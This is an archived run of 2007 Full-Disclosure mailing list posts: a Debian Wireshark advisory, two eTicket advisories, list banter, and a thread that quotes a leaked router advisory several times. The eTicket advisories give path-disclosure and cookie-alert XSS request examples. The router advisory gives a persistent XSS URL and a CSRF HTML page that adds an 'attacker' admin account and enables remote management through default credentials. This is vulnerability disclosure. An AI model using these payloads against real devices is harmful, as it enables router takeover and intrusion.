Due to your extreme uncooperativeness, I will be attempting to brute force the contents of this advisory in the meantime. Thank you. J On Wed, 27 Jun 2007 16:29:43 -0400 pagvac [EMAIL PROTECTED] wrote: The file research.txt will be provided once the vendor fixes the issues. At that point anyone can check that the hash matches the one included in this post. Thank you. Joey Mengele wrote: Please provide the original content of research.txt so I can verify that the hash is correct. I will also need the hash of your md5sum.exe. Thanks. J On Wed, 27 Jun 2007 16:02:16 -0400 pagvac [EMAIL PROTECTED] wrote: The HTTP interface of a network appliance has been researched and found to be vulnerable to several persistent XSS and CSRF. Such research was done by pdp (architect) and myself. We informed the vendor and will publish the details when a fix is available. The following is the MD5 hash for the advisory file. $ md5sum.exe research.txt 3db1d71fc3a0eae119617b3b1124206f *research.txt Regards, -- pagvac [http://gnucitizen.org, http://ikwt.com/] -- Click here for to find products that will help grow your small business. http://tagline.hushmail.com/fc/Ioyw6h4eDJc9UN71zvlsGp4ZGBzvqUZDr59L zooSm6N56gZuYA97Kt/ -- pagvac [http://gnucitizen.org, http://ikwt.com/] -- Click for a free comparison on healthcare coverage and save 100's http://tagline.hushmail.com/fc/Ioyw6h4d8cVJ5gmPcrhhqnHljcbEdlY2ctongGZQzI70rVknLc19WY/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1322-1] New wireshark packages fix denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1322-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff June 27th, 2007 http://www.debian.org/security/faq - -- Package: wireshark Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CVE-2007-3390 CVE-2007-3392 CVE-2007-3393 Several remote vulnerabilities have been discovered in the Wireshark network traffic analyzer, which may lead to denial of service. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2007-3390 Off-by-one overflows were discovered in the iSeries dissector. CVE-2007-3392 The MMS and SSL dissectors could be forced into an infinite loop. CVE-2007-3393 An off-by-one overflow was discovered in the DHCP/BOOTP dissector. The oldstable distribution (sarge) is not affected by these problems. (In Sarge Wireshark used to be called Ethereal). For the stable distribution (etch) these problems have been fixed in version 0.99.4-5.etch.0. Packages for the big endian MIPS architecture are not yet available. They will be provided later. For the unstable distribution (sid) these problems have been fixed in version 0.99.6pre1-1. We recommend that you upgrade your Wireshark packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.0.dsc Size/MD5 checksum: 1066 18ea1bc407fe203089596126d9429c64 http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.0.diff.gz Size/MD5 checksum:40945 82b8a22a1cc100e5649f278cabbcce4f http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4.orig.tar.gz Size/MD5 checksum: 13306790 2556a31d0d770dd1990bd67b98bd2f9b Alpha architecture: http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.0_alpha.deb Size/MD5 checksum:21714 5515a1d74b23c4ed53dafe1b15709263 http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.0_alpha.deb Size/MD5 checksum:21998 5d86aaf5e6ee3c8988ebaa9d07a2b05c http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.0_alpha.deb Size/MD5 checksum:21728 b58962a1f2f4797df61c9b465cb3e35c http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.0_alpha.deb Size/MD5 checksum:21722 5b4ee85d1b6f0b14f46604449af500dc http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.0_alpha.deb Size/MD5 checksum: 117204 48df4ca3664055b38c4bfa5c8196dc5a http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.0_alpha.deb Size/MD5 checksum: 674230 0ca5f13b6e7180c0b399a1ca1a3f9a7a http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.0_alpha.deb Size/MD5 checksum: 9319268 fcf022b011151abcf1d7665c7b9a98a4 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.0_alpha.deb Size/MD5 checksum: 181530 d4a0de99d59ecd1a3e818416d31a2d32 AMD64 architecture: http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.0_amd64.deb Size/MD5 checksum:22304 0cb411bd110cb7be99f0b426e52b68da http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.0_amd64.deb Size/MD5 checksum:22658 f8f1820a2ef75ad8d693be9a235a16bf http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.0_amd64.deb Size/MD5 checksum:22320 f59c3f8f5fd407e89852b9fca9c46796 http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.0_amd64.deb Size/MD5 checksum:22316 bb9fc8d3d87f2806cefb9b80e4586c1c http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.0_amd64.deb Size/MD5 checksum: 111908 df3804d4217ae00add067fc51945c364 http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.0_amd64.deb Size/MD5 checksum: 618876 de929e23361608de180194014ba3dfb3
Re: [Full-disclosure] Persistent XSS and CSRF on network appliance [subject corrected :) ]
After plugging this hash into John The Ripper, I was able to reproduce the text of the original advisory. It follows in entirety. For those wishing to verify the hash provided by the architect, I have also included the advisory in attachment form as a convenience for the skeptics who say MD5 can not be reversed. J ___ BEGIN LAME CRACKED ADVISORY ___ Persistent XSS and CSRF and on Wireless-G ADSL Gateway with SpeedBooster (WAG54GS) == Date found == 24 June 2007 == Firmware Version == V1.00.06 == Description == There are several persistent XSS vulnerabilities on the '/setup.cgi' script. It is possible to inject JavaScript by assigning a payload like the following to any of the vulnerable parameters: script[PAYLOAD]/script The vulnerable (non-sanitized) parameters are the following: 'devname' 'snmp_getcomm' 'snmp_setcomm' 'c4_trap_ip_' Additionally, all HTTP requests are not tokenized using non- predictable values. Thus, all requests to the router's HTTP interface are vulnerable to Cross-site Request Forgeries (CSRF), perhaps by design. The following is an example of a HTTP request (notice the lack of non-predictable tokens): POST /setup.cgi HTTP/1.1 Authorization: Basic YWRtaW46YWRtaW4= mtenRestore=Restore+Factory+Defaultstodo=defaultsettingsthis_file =Factorydefaults.htmnext_file=index.htmmessage= Although the original request is a POST, we can convert it to a GET, so that all posted parameters can be submitted on a single URL. For example, the previous POST request can be converted to a URL such as the following: http://admin:[EMAIL PROTECTED]/setup.cgi?mtenRestore=Restore+Factor y+Defaultstodo=defaultsettingsthis_file=Factorydefaults.htmnext_f ile=index.htmmessage= By forging administrative requests (Administration button on the router's HTML menu), an attacker can compromise the router provided the victim user visits a malicious URL or HTML page. The attack can only be successfuly if any of the following conditions are met: - the administrator hasn't changed the default credentials (admin/admin) - the administrator's browser has an active authentication session with the router's interface when the attack happens (highly unlikely) == Persistent XSS PoC == The following URL creates a DoS condition by making the Administration page inaccessible since 'history.back()' will run everytime the Administration page is visited. Thus the administrator won't be able to ever change the default credentials unless a hard reset is performed on using the router's physical restart switch: http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=1sysname=admin sysPasswd=adminsysConfirmPasswd=adminremote_management=enablehttp _wanport=8080devname=snmp_enable=disableupnp_enable=enablewlan_e nable=enablesave=Save+Settingsh_user_list=1h_pwset=yespwchanged= yesh_remote_management=enablec4_trap_ip_=scripthistory.back() /scripth_snmp_enable=enableh_upnp_enable=enableh_wlan_enable=ena bletodo=savethis_file=Administration.htmnext_file=Administration. htmmessage= http://tinyurl.com/36sjzw == CSRF PoC == The following HTML page does the following: - adds an *additional* administrative account, with a username equals to 'attacker' and a password equals to '0wned' (without removing original admin account!) - enables remote HTTP management over port 1337 - sets other settings that are inrelevant to this discussion html body script // send 2 requests to add an administrative account and enable remote management // tries with default credentials and with credentials cached by browser (if any) var img = new Image(); var img2 = new Image(); img.src = 'http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=8sysname=attack ersysPasswd=0wnedsysConfirmPasswd=0wnedremote_management=enableh ttp_wanport=1337devname=snmp_enable=disableupnp_enable=enablewla n_enable=enablesave=Save+Settingsh_user_list=8h_pwset=yespwchang ed=yesh_remote_management=enablec4_trap_ip_=h_snmp_enable=disable h_upnp_enable=enableh_wlan_enable=enabletodo=savethis_file=Admin istration.htmnext_file=Administration.htmmessage='; img2.src = 'http://192.168.1.1/setup.cgi?user_list=8sysname=attackersysPasswd =0wnedsysConfirmPasswd=0wnedremote_management=enablehttp_wanport= 1337devname=snmp_enable=disableupnp_enable=enablewlan_enable=ena blesave=Save+Settingsh_user_list=8h_pwset=yespwchanged=yesh_rem ote_management=enablec4_trap_ip_=h_snmp_enable=disableh_upnp_enab le=enableh_wlan_enable=enabletodo=savethis_file=Administration.ht mnext_file=Administration.htmmessage='; /script /body /html The first URL forges the administrative request using the default credentials, so it won't work if default credentials have been changed. The second URL doesn't specify any credentials as an attempt to use the browser's
[Full-disclosure] eTicket version 1.5.5 Path Disclosure Vulnerability
netVigilance Security Advisory #30 eTicket version 1.5.5 Path Disclosure Vulnerability Description: eTicket is an electronic (open source) support ticket system based on osTicket, that can receive tickets via email (pop3 or pipe) and a web-based form, as well as manage them using a web interface. External References: Mitre CVE: CVE-2007-2800 NVD NIST: CVE-2007-2800 OSVDB: 34785 Summary: eTicket is an electronic (open source) support ticket system based on osTicket. A security problem in the product allows attackers to gather the true path of the server-side script. Advisory URL: http://www.netvigilance.com/advisory0030 Release Date: 06/27/2007 Severity: Risk: Low CVSS Metrics: Access Vector: Remote Access Complexity: Low Authentication: Not-required Confidentiality Impact: Partial Integrity Impact: None Availability Impact: None Impact Bias: Normal CVSS Base Score: 2.3 Target Distribution on Internet: Low Exploitability: Functional Exploit Remediation Level: Workaround Report Confidence: Confirmed Vulnerability Impact: Attack Host Impact: Path disclosure SecureScout Testcase ID: TC 17960 Vulnerable Systems: eTicket version 1.5.5 (new version 1.5.5.1 is also vulnerable) Vulnerability Type: Program flaws - The product scripts have flaws which lead to Warnings. Vendor: HM2K Vendor Status: HM 2K from eTicket got the Draft advisory on 21 May 2007 and got extensive support in how to fix the security problems on 23 May 2007 and 28 May 2007. In HM 2K's own words HM 2K lost interest and HM 2K seriously found it too difficult to orchestrate what you [netVigilance] were asking from me [HM 2K], so I just did what I thought was best.. netVigilance's tests show that version 1.5.5.1 is also vulnerable. There currently is no official fix for this advisory. Workaround: Disable warning messages: modify in the php.ini file following line: display_errors = Off. Example: REQUEST: http://[TARGET]/[PRODUCT FOLDER]/index.php?name[]=1 OR http://[TARGET]/[PRODUCT FOLDER]/index.php?email[]=1 OR http://[TARGET]/[PRODUCT FOLDER]/index.php?phone[]=1 OR http://[TARGET]/[PRODUCT FOLDER]/index.php?subject[]=1 OR (available for version 1.5.5 and also for new version 1.5.5.1) Make file (example.html) with the next content: html body onLoad=document.forms(0).submit(); form action=http://[TARGET]/[PRODUCT FOLDER]/index.php method=POST input type=hidden name=name[] value=1 input type=hidden name=email[] value=1 input type=hidden name=phone[] value=1 input type=hidden name=subject[] value=1 /form /body /html Then load it in any web browser. REPLY: bWarning/b: htmlspecialchars() expects parameter 1 to be string, array given in b[DISCLOSED PATH][PRODUCT FOLDER]\inc\open_form.php/b on line b[18 OR 26 OR 31 OR 51 OR 55]/bbr / Credits: Jesper Jurcenoks Co-founder netVigilance, Inc www.netvigilance.c ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] eTicket version 1.5.5 XSS Attack Vulnerability
netVigilance Security Advisory #31 eTicket version 1.5.5 XSS Attack Vulnerability Description: eTicket is an electronic (open source) support ticket system based on osTicket, that can receive tickets via email (pop3 or pipe) and a web-based form, as well as manage them using a web interface. Successful exploitation requires PHP register_globals set to On. External References: Mitre CVE: CVE-2007-2801 NVD NIST: CVE-2007-2801 OSVDB: 34786 Summary: eTicket is an electronic (open source) support ticket system based on osTicket. Security problem in the product allows attackers to conduct XSS attacks. Advisory URL: http://www.netvigilance.com/advisory0031 Release Date: 06/27/2007 Severity: Risk: Medium CVSS Metrics: Access Vector: Remote Access Complexity: High Authentication: Not-required Confidentiality Impact: Partial Integrity Impact: Partial Availability Impact: Partial Impact Bias: Normal CVSS Base Score: 5.6 Target Distribution on Internet: Low Exploitability: Functional Exploit Remediation Level: Workaround Report Confidence: Confirmed Vulnerability Impact: Attack Host Impact: XSS Attack SecureScout Testcase ID: TC 17961 Vulnerable Systems: eTicket version 1.5.5 (new version 1.5.5.1 is also vulnerable) Vulnerability Type: XSS (Cross-Site Scripting) to force a web-site to display malicious contents to the target, by sending a specially crafted request to the web-site. The vulnerable web-site is not the target of attack but is used as a tool for the hacker in the attack of the victim. Vendor: HM2K Vendor Status: HM 2K from eTicket got the Draft advisory on 21 May 2007 and got extensive support in how to fix the security problems on 23 May 2007 and 28 May 2007. In HM 2K's own words HM 2K lost interest and HM 2K seriously found it too difficult to orchestrate what you [netVigilance] were asking from me [HM 2K], so I just did what I thought was best.. netVigilance's tests show that version 1.5.5.1 is also vulnerable. There currently is no official fix for this advisory. Workaround: In the php.ini file set register_globals = Off. Example: REQUEST: http://[TARGET]/[PRODUCT FOLDER]/open.php?err=scriptalert(document.cookie)/script OR http://[TARGET]/[PRODUCT FOLDER]/open.php?warn=scriptalert(document.cookie)/script REPLY: Will execute scriptalert(document.cookie)/script Credits: Jesper Jurcenoks Co-founder netVigilance, Inc www.netvigilance.c ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Month of Random Hashes: DAY FOURTEEN
Ha ;) The question is are they really hashes? On 6/27/07, Jared DeMott [EMAIL PROTECTED] wrote: Dr. Neal Krawetz PhD wrote: Send it over here. The picture, not the hash. I have the technologies to determine whether the image is computer generated, digitally altered, or legitimately a real picture! These technologies shall be unveiled at Blackhat during my presentation. Sometimes it is difficult to determine which asses are real in this facade that is the computer security world. - doc neal http://www.hackerfactor.com/blog/ ps: if time provides during my speech, I will discuss the many difficulties I have experienced as a computer security consultant while attempting to have fake myspace accounts shut down for my clients! hahahahahahha. believe me, no one really wants to see it! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/watches.asp?Brand=14 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Persistent XSS and CSRF on network appliance [subject corrected :) ]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Nice look up to http://unknown.pentester.googlepages.com/sitemap.xml If you bothered that much you deserve the advisory I guess :-D. btw, I didn't know google pages have sitemap.xml enabled by default. So no hash cracking here, just to set things straight. Joey Mengele wrote: After plugging this hash into John The Ripper, I was able to reproduce the text of the original advisory. It follows in entirety. For those wishing to verify the hash provided by the architect, I have also included the advisory in attachment form as a convenience for the skeptics who say MD5 can not be reversed. J ___ BEGIN LAME CRACKED ADVISORY ___ Persistent XSS and CSRF and on Wireless-G ADSL Gateway with SpeedBooster (WAG54GS) == Date found == 24 June 2007 == Firmware Version == V1.00.06 == Description == There are several persistent XSS vulnerabilities on the '/setup.cgi' script. It is possible to inject JavaScript by assigning a payload like the following to any of the vulnerable parameters: script[PAYLOAD]/script The vulnerable (non-sanitized) parameters are the following: 'devname' 'snmp_getcomm' 'snmp_setcomm' 'c4_trap_ip_' Additionally, all HTTP requests are not tokenized using non- predictable values. Thus, all requests to the router's HTTP interface are vulnerable to Cross-site Request Forgeries (CSRF), perhaps by design. The following is an example of a HTTP request (notice the lack of non-predictable tokens): POST /setup.cgi HTTP/1.1 Authorization: Basic YWRtaW46YWRtaW4= mtenRestore=Restore+Factory+Defaultstodo=defaultsettingsthis_file =Factorydefaults.htmnext_file=index.htmmessage= Although the original request is a POST, we can convert it to a GET, so that all posted parameters can be submitted on a single URL. For example, the previous POST request can be converted to a URL such as the following: http://admin:[EMAIL PROTECTED]/setup.cgi?mtenRestore=Restore+Factor y+Defaultstodo=defaultsettingsthis_file=Factorydefaults.htmnext_f ile=index.htmmessage= By forging administrative requests (Administration button on the router's HTML menu), an attacker can compromise the router provided the victim user visits a malicious URL or HTML page. The attack can only be successfuly if any of the following conditions are met: - the administrator hasn't changed the default credentials (admin/admin) - the administrator's browser has an active authentication session with the router's interface when the attack happens (highly unlikely) == Persistent XSS PoC == The following URL creates a DoS condition by making the Administration page inaccessible since 'history.back()' will run everytime the Administration page is visited. Thus the administrator won't be able to ever change the default credentials unless a hard reset is performed on using the router's physical restart switch: http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=1sysname=admin sysPasswd=adminsysConfirmPasswd=adminremote_management=enablehttp _wanport=8080devname=snmp_enable=disableupnp_enable=enablewlan_e nable=enablesave=Save+Settingsh_user_list=1h_pwset=yespwchanged= yesh_remote_management=enablec4_trap_ip_=scripthistory.back() /scripth_snmp_enable=enableh_upnp_enable=enableh_wlan_enable=ena bletodo=savethis_file=Administration.htmnext_file=Administration. htmmessage= http://tinyurl.com/36sjzw == CSRF PoC == The following HTML page does the following: - adds an *additional* administrative account, with a username equals to 'attacker' and a password equals to '0wned' (without removing original admin account!) - enables remote HTTP management over port 1337 - sets other settings that are inrelevant to this discussion html body script // send 2 requests to add an administrative account and enable remote management // tries with default credentials and with credentials cached by browser (if any) var img = new Image(); var img2 = new Image(); img.src = 'http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=8sysname=attack ersysPasswd=0wnedsysConfirmPasswd=0wnedremote_management=enableh ttp_wanport=1337devname=snmp_enable=disableupnp_enable=enablewla n_enable=enablesave=Save+Settingsh_user_list=8h_pwset=yespwchang ed=yesh_remote_management=enablec4_trap_ip_=h_snmp_enable=disable h_upnp_enable=enableh_wlan_enable=enabletodo=savethis_file=Admin istration.htmnext_file=Administration.htmmessage='; img2.src = 'http://192.168.1.1/setup.cgi?user_list=8sysname=attackersysPasswd =0wnedsysConfirmPasswd=0wnedremote_management=enablehttp_wanport= 1337devname=snmp_enable=disableupnp_enable=enablewlan_enable=ena blesave=Save+Settingsh_user_list=8h_pwset=yespwchanged=yesh_rem ote_management=enablec4_trap_ip_=h_snmp_enable=disableh_upnp_enab le=enableh_wlan_enable=enabletodo=savethis_file=Administration.ht
Re: [Full-disclosure] Persistent XSS and CSRF on network appliance [subject corrected :) ]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Nice look up to http://unknown.pentester.googlepages.com/sitemap.xml If you bothered that much you deserve the advisory I guess :-D. btw, I didn't know google pages have sitemap.xml enabled by default. So no hash cracking here, just to set things straight. Joey Mengele wrote: After plugging this hash into John The Ripper, I was able to reproduce the text of the original advisory. It follows in entirety. For those wishing to verify the hash provided by the architect, I have also included the advisory in attachment form as a convenience for the skeptics who say MD5 can not be reversed. J ___ BEGIN LAME CRACKED ADVISORY ___ Persistent XSS and CSRF and on Wireless-G ADSL Gateway with SpeedBooster (WAG54GS) == Date found == 24 June 2007 == Firmware Version == V1.00.06 == Description == There are several persistent XSS vulnerabilities on the '/setup.cgi' script. It is possible to inject JavaScript by assigning a payload like the following to any of the vulnerable parameters: script[PAYLOAD]/script The vulnerable (non-sanitized) parameters are the following: 'devname' 'snmp_getcomm' 'snmp_setcomm' 'c4_trap_ip_' Additionally, all HTTP requests are not tokenized using non- predictable values. Thus, all requests to the router's HTTP interface are vulnerable to Cross-site Request Forgeries (CSRF), perhaps by design. The following is an example of a HTTP request (notice the lack of non-predictable tokens): POST /setup.cgi HTTP/1.1 Authorization: Basic YWRtaW46YWRtaW4= mtenRestore=Restore+Factory+Defaultstodo=defaultsettingsthis_file =Factorydefaults.htmnext_file=index.htmmessage= Although the original request is a POST, we can convert it to a GET, so that all posted parameters can be submitted on a single URL. For example, the previous POST request can be converted to a URL such as the following: http://admin:[EMAIL PROTECTED]/setup.cgi?mtenRestore=Restore+Factor y+Defaultstodo=defaultsettingsthis_file=Factorydefaults.htmnext_f ile=index.htmmessage= By forging administrative requests (Administration button on the router's HTML menu), an attacker can compromise the router provided the victim user visits a malicious URL or HTML page. The attack can only be successfuly if any of the following conditions are met: - the administrator hasn't changed the default credentials (admin/admin) - the administrator's browser has an active authentication session with the router's interface when the attack happens (highly unlikely) == Persistent XSS PoC == The following URL creates a DoS condition by making the Administration page inaccessible since 'history.back()' will run everytime the Administration page is visited. Thus the administrator won't be able to ever change the default credentials unless a hard reset is performed on using the router's physical restart switch: http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=1sysname=admin sysPasswd=adminsysConfirmPasswd=adminremote_management=enablehttp _wanport=8080devname=snmp_enable=disableupnp_enable=enablewlan_e nable=enablesave=Save+Settingsh_user_list=1h_pwset=yespwchanged= yesh_remote_management=enablec4_trap_ip_=scripthistory.back() /scripth_snmp_enable=enableh_upnp_enable=enableh_wlan_enable=ena bletodo=savethis_file=Administration.htmnext_file=Administration. htmmessage= http://tinyurl.com/36sjzw == CSRF PoC == The following HTML page does the following: - adds an *additional* administrative account, with a username equals to 'attacker' and a password equals to '0wned' (without removing original admin account!) - enables remote HTTP management over port 1337 - sets other settings that are inrelevant to this discussion html body script // send 2 requests to add an administrative account and enable remote management // tries with default credentials and with credentials cached by browser (if any) var img = new Image(); var img2 = new Image(); img.src = 'http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=8sysname=attack ersysPasswd=0wnedsysConfirmPasswd=0wnedremote_management=enableh ttp_wanport=1337devname=snmp_enable=disableupnp_enable=enablewla n_enable=enablesave=Save+Settingsh_user_list=8h_pwset=yespwchang ed=yesh_remote_management=enablec4_trap_ip_=h_snmp_enable=disable h_upnp_enable=enableh_wlan_enable=enabletodo=savethis_file=Admin istration.htmnext_file=Administration.htmmessage='; img2.src = 'http://192.168.1.1/setup.cgi?user_list=8sysname=attackersysPasswd =0wnedsysConfirmPasswd=0wnedremote_management=enablehttp_wanport= 1337devname=snmp_enable=disableupnp_enable=enablewlan_enable=ena blesave=Save+Settingsh_user_list=8h_pwset=yespwchanged=yesh_rem ote_management=enablec4_trap_ip_=h_snmp_enable=disableh_upnp_enab le=enableh_wlan_enable=enabletodo=savethis_file=Administration.ht
Re: [Full-disclosure] Persistent XSS and CSRF on network appliance [subject corrected :) ]
We heard you the first time, gobbles aka n3td3v. - doc neal http://www.hackerfactor.com/blog/ On Wed, Jun 27, 2007 at 10:49:25PM +0100, pagvac wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Nice look up to http://unknown.pentester.googlepages.com/sitemap.xml If you bothered that much you deserve the advisory I guess :-D. btw, I didn't know google pages have sitemap.xml enabled by default. So no hash cracking here, just to set things straight. Joey Mengele wrote: After plugging this hash into John The Ripper, I was able to reproduce the text of the original advisory. It follows in entirety. For those wishing to verify the hash provided by the architect, I have also included the advisory in attachment form as a convenience for the skeptics who say MD5 can not be reversed. J ___ BEGIN LAME CRACKED ADVISORY ___ Persistent XSS and CSRF and on Wireless-G ADSL Gateway with SpeedBooster (WAG54GS) == Date found == 24 June 2007 == Firmware Version == V1.00.06 == Description == There are several persistent XSS vulnerabilities on the '/setup.cgi' script. It is possible to inject JavaScript by assigning a payload like the following to any of the vulnerable parameters: script[PAYLOAD]/script The vulnerable (non-sanitized) parameters are the following: 'devname' 'snmp_getcomm' 'snmp_setcomm' 'c4_trap_ip_' Additionally, all HTTP requests are not tokenized using non- predictable values. Thus, all requests to the router's HTTP interface are vulnerable to Cross-site Request Forgeries (CSRF), perhaps by design. The following is an example of a HTTP request (notice the lack of non-predictable tokens): POST /setup.cgi HTTP/1.1 Authorization: Basic YWRtaW46YWRtaW4= mtenRestore=Restore+Factory+Defaultstodo=defaultsettingsthis_file =Factorydefaults.htmnext_file=index.htmmessage= Although the original request is a POST, we can convert it to a GET, so that all posted parameters can be submitted on a single URL. For example, the previous POST request can be converted to a URL such as the following: http://admin:[EMAIL PROTECTED]/setup.cgi?mtenRestore=Restore+Factor y+Defaultstodo=defaultsettingsthis_file=Factorydefaults.htmnext_f ile=index.htmmessage= By forging administrative requests (Administration button on the router's HTML menu), an attacker can compromise the router provided the victim user visits a malicious URL or HTML page. The attack can only be successfuly if any of the following conditions are met: - the administrator hasn't changed the default credentials (admin/admin) - the administrator's browser has an active authentication session with the router's interface when the attack happens (highly unlikely) == Persistent XSS PoC == The following URL creates a DoS condition by making the Administration page inaccessible since 'history.back()' will run everytime the Administration page is visited. Thus the administrator won't be able to ever change the default credentials unless a hard reset is performed on using the router's physical restart switch: http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=1sysname=admin sysPasswd=adminsysConfirmPasswd=adminremote_management=enablehttp _wanport=8080devname=snmp_enable=disableupnp_enable=enablewlan_e nable=enablesave=Save+Settingsh_user_list=1h_pwset=yespwchanged= yesh_remote_management=enablec4_trap_ip_=scripthistory.back() /scripth_snmp_enable=enableh_upnp_enable=enableh_wlan_enable=ena bletodo=savethis_file=Administration.htmnext_file=Administration. htmmessage= http://tinyurl.com/36sjzw == CSRF PoC == The following HTML page does the following: - adds an *additional* administrative account, with a username equals to 'attacker' and a password equals to '0wned' (without removing original admin account!) - enables remote HTTP management over port 1337 - sets other settings that are inrelevant to this discussion html body script // send 2 requests to add an administrative account and enable remote management // tries with default credentials and with credentials cached by browser (if any) var img = new Image(); var img2 = new Image(); img.src = 'http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=8sysname=attack ersysPasswd=0wnedsysConfirmPasswd=0wnedremote_management=enableh ttp_wanport=1337devname=snmp_enable=disableupnp_enable=enablewla n_enable=enablesave=Save+Settingsh_user_list=8h_pwset=yespwchang ed=yesh_remote_management=enablec4_trap_ip_=h_snmp_enable=disable h_upnp_enable=enableh_wlan_enable=enabletodo=savethis_file=Admin istration.htmnext_file=Administration.htmmessage='; img2.src = 'http://192.168.1.1/setup.cgi?user_list=8sysname=attackersysPasswd
Re: [Full-disclosure] Persistent XSS and CSRF on network appliance [subject corrected :) ]
I believe this makes you the fool. - doc neal, phd http://www.hackerfactor.com/blog/ On Wed, Jun 27, 2007 at 11:07:11PM +0100, pagvac wrote: I didn't intend to send it twice. On 6/27/07, Dr. Neal Krawetz PhD [EMAIL PROTECTED] wrote: We heard you the first time, gobbles aka n3td3v. - doc neal http://www.hackerfactor.com/blog/ On Wed, Jun 27, 2007 at 10:49:25PM +0100, pagvac wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Nice look up to http://unknown.pentester.googlepages.com/sitemap.xml If you bothered that much you deserve the advisory I guess :-D. btw, I didn't know google pages have sitemap.xml enabled by default. So no hash cracking here, just to set things straight. Joey Mengele wrote: After plugging this hash into John The Ripper, I was able to reproduce the text of the original advisory. It follows in entirety. For those wishing to verify the hash provided by the architect, I have also included the advisory in attachment form as a convenience for the skeptics who say MD5 can not be reversed. J ___ BEGIN LAME CRACKED ADVISORY ___ Persistent XSS and CSRF and on Wireless-G ADSL Gateway with SpeedBooster (WAG54GS) == Date found == 24 June 2007 == Firmware Version == V1.00.06 == Description == There are several persistent XSS vulnerabilities on the '/setup.cgi' script. It is possible to inject JavaScript by assigning a payload like the following to any of the vulnerable parameters: script[PAYLOAD]/script The vulnerable (non-sanitized) parameters are the following: 'devname' 'snmp_getcomm' 'snmp_setcomm' 'c4_trap_ip_' Additionally, all HTTP requests are not tokenized using non- predictable values. Thus, all requests to the router's HTTP interface are vulnerable to Cross-site Request Forgeries (CSRF), perhaps by design. The following is an example of a HTTP request (notice the lack of non-predictable tokens): POST /setup.cgi HTTP/1.1 Authorization: Basic YWRtaW46YWRtaW4= mtenRestore=Restore+Factory+Defaultstodo=defaultsettingsthis_file =Factorydefaults.htmnext_file=index.htmmessage= Although the original request is a POST, we can convert it to a GET, so that all posted parameters can be submitted on a single URL. For example, the previous POST request can be converted to a URL such as the following: http://admin:[EMAIL PROTECTED]/setup.cgi?mtenRestore=Restore+Factor y+Defaultstodo=defaultsettingsthis_file=Factorydefaults.htmnext_f ile=index.htmmessage= By forging administrative requests (Administration button on the router's HTML menu), an attacker can compromise the router provided the victim user visits a malicious URL or HTML page. The attack can only be successfuly if any of the following conditions are met: - the administrator hasn't changed the default credentials (admin/admin) - the administrator's browser has an active authentication session with the router's interface when the attack happens (highly unlikely) == Persistent XSS PoC == The following URL creates a DoS condition by making the Administration page inaccessible since 'history.back()' will run everytime the Administration page is visited. Thus the administrator won't be able to ever change the default credentials unless a hard reset is performed on using the router's physical restart switch: http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=1sysname=admin sysPasswd=adminsysConfirmPasswd=adminremote_management=enablehttp _wanport=8080devname=snmp_enable=disableupnp_enable=enablewlan_e nable=enablesave=Save+Settingsh_user_list=1h_pwset=yespwchanged= yesh_remote_management=enablec4_trap_ip_=scripthistory.back() /scripth_snmp_enable=enableh_upnp_enable=enableh_wlan_enable=ena bletodo=savethis_file=Administration.htmnext_file=Administration. htmmessage= http://tinyurl.com/36sjzw == CSRF PoC == The following HTML page does the following: - adds an *additional* administrative account, with a username equals to 'attacker' and a password equals to '0wned' (without removing original admin account!) - enables remote HTTP management over port 1337 - sets other settings that are inrelevant to this discussion html body script // send 2 requests to add an administrative account and 